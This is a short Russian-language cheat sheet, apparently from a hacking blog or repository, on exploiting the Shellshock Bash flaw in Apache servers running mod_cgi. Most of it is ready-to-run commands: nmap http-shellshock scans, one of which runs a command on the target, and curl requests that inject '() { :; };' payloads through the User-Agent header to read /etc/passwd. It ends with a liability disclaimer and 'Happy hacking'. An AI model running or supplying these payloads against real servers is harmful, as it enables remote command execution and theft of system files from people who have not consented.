
Эксплуатация уязвимости «Shellshock». Удаленное выполнение кода в Apache с mod_cgi
Shellshock — это уязвимость удалённого выполнения команд в BASH. Данный скрипт эксплуатирует уязвимость в веб-среде Apache или аналогичных серверов с включённым mod_cgi. Уязвимость заключается в манипуляции переменными окружения — динамическими именованными значениями, которые влияют на выполнение процессов на компьютере. Атакующие могут воспользоваться этим, прикрепляя вредоносный код к переменным окружения, который выполняется при получении переменной. Это позволяет атакующим потенциально скомпрометировать систему.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
Я не несу ответственности за любое незаконное использование или ущерб, причинённый этим инструментом. Он был написан ради развлечения, а не ради зла, и предназначен для повышения осведомлённости о хакинге и кибербезопасности
Удачного хакерства :)